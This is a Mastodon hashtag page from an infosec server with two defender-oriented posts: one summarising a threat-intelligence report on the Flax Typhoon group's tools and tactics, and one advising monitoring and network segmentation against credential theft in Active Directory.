Just Another Blue Teamer<p>Good day everyone! The Microsoft Threat Intelligence team has discovered activity from a group known as <a href="https://ioc.exchange/tags/FlaxTyphoon" class="mention hashtag" rel="tag">#<span>FlaxTyphoon</span></a>. They are a nation-state group from China that targeted organizations in Taiwan. While the group leverages tools that are commonly used, like <a href="https://ioc.exchange/tags/ChinaChopper" class="mention hashtag" rel="tag">#<span>ChinaChopper</span></a>, <a href="https://ioc.exchange/tags/MetaSploit" class="mention hashtag" rel="tag">#<span>MetaSploit</span></a>, and <a href="https://ioc.exchange/tags/Mimikatz" class="mention hashtag" rel="tag">#<span>Mimikatz</span></a>, they also rely on abusing <a href="https://ioc.exchange/tags/LOLBINS" class="mention hashtag" rel="tag">#<span>LOLBINS</span></a>, or Living-off-the-land binaries and scripts (tools that exist and come with the native operating system). Some of their TTPs include using registry key modification for persistence, using <a href="https://ioc.exchange/tags/powershell" class="mention hashtag" rel="tag">#<span>powershell</span></a>, <a href="https://ioc.exchange/tags/certutil" class="mention hashtag" rel="tag">#<span>certutil</span></a>, or <a href="https://ioc.exchange/tags/bitsadmin" class="mention hashtag" rel="tag">#<span>bitsadmin</span></a> to download tools, and accessing <a href="https://ioc.exchange/tags/LSASS" class="mention hashtag" rel="tag">#<span>LSASS</span></a> process memory and Security Account Manager registry hive for credential access. This is a great article that not only provides high-level details but it provides a starting point for any organization to start threat hunting by using the technical details provided! Enjoy your weekend and <a href="https://ioc.exchange/tags/HappyHunting" class="mention hashtag" rel="tag">#<span>HappyHunting</span></a>!</p><p><a href="https://ioc.exchange/tags/CyberSecurity" class="mention hashtag" rel="tag">#<span>CyberSecurity</span></a> <a href="https://ioc.exchange/tags/ITSecurity" class="mention hashtag" rel="tag">#<span>ITSecurity</span></a> <a href="https://ioc.exchange/tags/InfoSec" class="mention hashtag" rel="tag">#<span>InfoSec</span></a> <a href="https://ioc.exchange/tags/BlueTeam" class="mention hashtag" rel="tag">#<span>BlueTeam</span></a> <a href="https://ioc.exchange/tags/ThreatIntel" class="mention hashtag" rel="tag">#<span>ThreatIntel</span></a> <a href="https://ioc.exchange/tags/ThreatHunting" class="mention hashtag" rel="tag">#<span>ThreatHunting</span></a> <a href="https://ioc.exchange/tags/ThreatDetection" class="mention hashtag" rel="tag">#<span>ThreatDetection</span></a> <a href="https://ioc.exchange/tags/readoftheday" class="mention hashtag" rel="tag">#<span>readoftheday</span></a></p>
Recent searches
No recent searches
Search options
Only available when logged in.
ioc.exchange is one of the many independent Mastodon servers you can use to participate in the fediverse.
INDICATORS OF COMPROMISE (IOC)
InfoSec Community within the Fediverse. Newbies, experts, gurus - Everyone is Welcome! Instance is supposed to be fast and secure.
Administered by:
Server stats:
1.6Kactive users
ioc.exchange: About · Status · Profiles directory · Privacy policy
Mastodon: About · Get the app · Keyboard shortcuts · View source code · v4.3.4
#mimikatz
0 posts · 0 participants · 0 posts today
Geekmaster 👽:system76:<p>Also be sure to turn on these monitoring policies in <a href="https://ioc.exchange/tags/DefenderForCloudApps" class="mention hashtag" rel="tag">#<span>DefenderForCloudApps</span></a> so you can <a href="https://ioc.exchange/tags/CatchTheHacker" class="mention hashtag" rel="tag">#<span>CatchTheHacker</span></a> before they get too deep, whether you switch to <a href="https://ioc.exchange/tags/Kerberos" class="mention hashtag" rel="tag">#<span>Kerberos</span></a> or not. <a href="https://ioc.exchange/tags/NetworkSegregation" class="mention hashtag" rel="tag">#<span>NetworkSegregation</span></a> is also a great <a href="https://ioc.exchange/tags/LayeredDefense" class="mention hashtag" rel="tag">#<span>LayeredDefense</span></a> method to ensure if one system is compromised the attacker can't use <a href="https://ioc.exchange/tags/SMBtraversal" class="mention hashtag" rel="tag">#<span>SMBtraversal</span></a> to get to all your computers, globally. <a href="https://ioc.exchange/tags/EternalBlue" class="mention hashtag" rel="tag">#<span>EternalBlue</span></a> source code is still being used to get to <a href="https://ioc.exchange/tags/DCs" class="mention hashtag" rel="tag">#<span>DCs</span></a> via <a href="https://ioc.exchange/tags/Trikbot" class="mention hashtag" rel="tag">#<span>Trikbot</span></a> evolutions, after <a href="https://ioc.exchange/tags/Phishing" class="mention hashtag" rel="tag">#<span>Phishing</span></a> a user with <a href="https://ioc.exchange/tags/LocalAdmin" class="mention hashtag" rel="tag">#<span>LocalAdmin</span></a> privileges, to execute <a href="https://ioc.exchange/tags/mimikatz" class="mention hashtag" rel="tag">#<span>mimikatz</span></a> against <a href="https://ioc.exchange/tags/ActiveDirectory" class="mention hashtag" rel="tag">#<span>ActiveDirectory</span></a> to steal all the objects. <a href="https://ioc.exchange/tags/YesThisHappened" class="mention hashtag" rel="tag">#<span>YesThisHappened</span></a></p>
ExploreLive feeds
Mastodon is the best way to keep up with what's happening.
Follow anyone across the fediverse and see it all in chronological order. No algorithms, ads, or clickbait in sight.
Create accountLoginDrag & drop to upload